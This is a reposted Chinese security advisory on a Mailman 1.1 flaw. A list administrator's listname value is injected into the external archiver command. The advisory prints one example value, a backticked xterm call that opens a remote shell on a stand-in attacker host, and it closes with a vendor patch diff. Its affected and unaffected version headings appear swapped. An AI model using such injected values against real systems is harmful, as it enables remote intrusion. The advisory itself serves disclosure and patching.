Mailman 1.1 远程执行命令漏洞
2008-04-09 04:32:12来源:互联网 阅读 ()
发布日期:2000-09-12
更新日期:2000-09-12
受影响系统:
不受影响系统:
GNU Mailman 1.1
所有安装了此版本的Unix/Linux系统
描述:
GNU Mailman 2.0beta5
GNU Mailman 2.0beta4
Mailman的配置文件中使用的一些变量可以由邮件列表管理员指定。例如在$prefix/Mailman/mm_cfg.py配置文件中
可能有下列配置语句:
PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'
这里(listname)的值可以被邮件列表的管理员创建,如果,这个值被设置成一些系统命令,当消息被发送到这个列表
时,系统就会执行这些命令,例如,如果listname的值设置成了:
`/usr/X11R6/bin/xterm -display www.attacker.com:0 -e /bin/csh`
攻击者就可以在自己的机器上打开一个mailman主机的xterm窗口。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
建议:
厂商补丁:
升级到Mailman的最新版本2.0beta4/5,或者安装下面提供的补丁:
-------------------- snip snip --------------------
*** admin.py.bak Mon Mar 13 21:03:53 2000
--- admin.py Mon Mar 13 21:04:51 2000
***************
*** 784,789 ****
--- 784,800 ----
val = cgi_info[property].value
value = GetValidValue(lst, property, kind, val, deps)
if getattr(lst, property) != value:
# TBD: Ensure that lst.real_name differs only in letter
# case. Otherwise a security hole can potentially be opened
# when using an external archiver. This seems ad-hoc and
# could use a more general security policy.
if property == 'real_name' and \
string.lower(value) <> string.lower(lst._internal_name):
# then don't install this value.
document.AddItem("""<p><b>real_name</b> attribute not
changed! It must differ from the list's name by case
only.<p>""")
continue
setattr(lst, property, value)
dirty = 1
#
-------------------- snip snip --------------------
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash